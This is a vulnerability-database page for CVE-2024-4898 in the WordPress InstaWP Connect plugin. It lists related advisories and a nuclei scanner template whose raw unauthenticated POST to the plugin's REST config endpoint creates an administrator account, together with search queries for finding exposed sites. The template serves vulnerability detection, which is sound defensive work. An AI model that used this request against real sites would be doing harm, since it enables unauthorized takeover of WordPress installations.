Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress InstaWP Connect <= 0.1.0.38 - Unauthenticated User Creation

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 8 Views

Unauthenticated attackers can update options and create administrator accounts via InstaWP Connect REST API up to version 0.1.0.38.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2024-4898
12 Jun 202410:27
circl
CNNVD		WordPress plugin InstaWP Connect security vulnerability
12 Jun 202400:00
cnnvd
CVE		CVE-2024-4898
12 Jun 202411:05
cve
Cvelist		CVE-2024-4898 InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup/Arbitrary Options Update/Administrative User Creation
12 Jun 202411:05
cvelist
NVD		CVE-2024-4898
12 Jun 202411:15
nvd
Patchstack		WordPress InstaWP Connect Plugin <= 0.1.0.38 is vulnerable to Broken Access Control
12 Jun 202400:00
patchstack
Patchstack		WordPress InstaWP Connect plugin <= 0.1.0.38 - Missing Authorization to Unauthenticated API setup/Arbitrary Options Update/Administrative User Creation vulnerability
12 Jun 202408:14
patchstack
Positive Technologies		PT-2024-33309 · WordPress · Instawp Connect
12 Jun 202400:00
ptsecurity
RedhatCVE		CVE-2024-4898
5 Feb 202500:12
redhatcve
VulnCheck KEV		VulnCheck KEV: CVE-2024-4898
12 Jun 202400:00
vulncheck_kev
Rows per page
id: CVE-2024-4898

info:
  name: WordPress InstaWP Connect <= 0.1.0.38 - Unauthenticated User Creation
  author: Sourabh-Sahu
  severity: critical
  description: |
    The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary option updates due to a missing authorization checks on the REST API calls in all versions up to, and including, 0.1.0.38. This makes it possible for unauthenticated attackers to connect the site to InstaWP API, edit arbitrary site options and create administrator accounts.
  impact: |
    Unauthenticated attackers can create administrator accounts and modify site options, leading to complete site takeover.
  remediation: |
    Update InstaWP Connect to version 0.1.0.39 or later, which patches this vulnerability.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/92a00fb4-7b50-43fd-ac04-5d6e29336e9c?source=cve
    - https://plugins.trac.wordpress.org/browser/instawp-connect/tags/0.1.0.38/includes/class-instawp-rest-api.php#L926
    - https://nvd.nist.gov/vuln/detail/CVE-2024-4898
    - https://github.com/truonghuuphuc/CVE-2024-4898-Poc
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-4898
    cwe-id: CWE-862
    epss-score: 0.90017
    epss-percentile: 0.99599
    cpe: cpe:2.3:a:instawp:instawp_connect:*:*:*:*:*:wordpress:*:*
  metadata:
    vendor: instawp
    product: instawp_connect
    framework: wordpress
    publicwww-query: "/wp-content/plugins/instawp-connect/"
    fofa-query: body="/wp-content/plugins/instawp-connect/"
  tags: cve,cve2024,wp,wp-plugin,wordpress,instawp,intrusive,priv-esc,vkev,vuln

variables:
  username: "{{rand_base(6)}}"
  password: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  api_key: "{{api_key}}"

http:
  - raw:
      - |
        POST /wp-json/instawp-connect/v1/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "api_key": "{{api_key}}",
          "wp": {
            "users": [
              {
                "username": "{{username}}",
                "email": "{{email}}",
                "password": "{{password}}"
              }
            ]
          }
        }

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"status":true'
          - '"connect_id":'
          - '"message":"Connected"'
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206453c2b61a97ced303281c840c81c1e627286b16ed46d25884331195ed91df8702203113a21fff5c22bde6d4711cff56d7b86af96ac5961de0b7e699f7be5b6d1bd1:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.8
EPSS0.90017
SSVC
wordpressinstawp connectunauthenticatedadministrator accountrest apiprivilege escalationplugin
8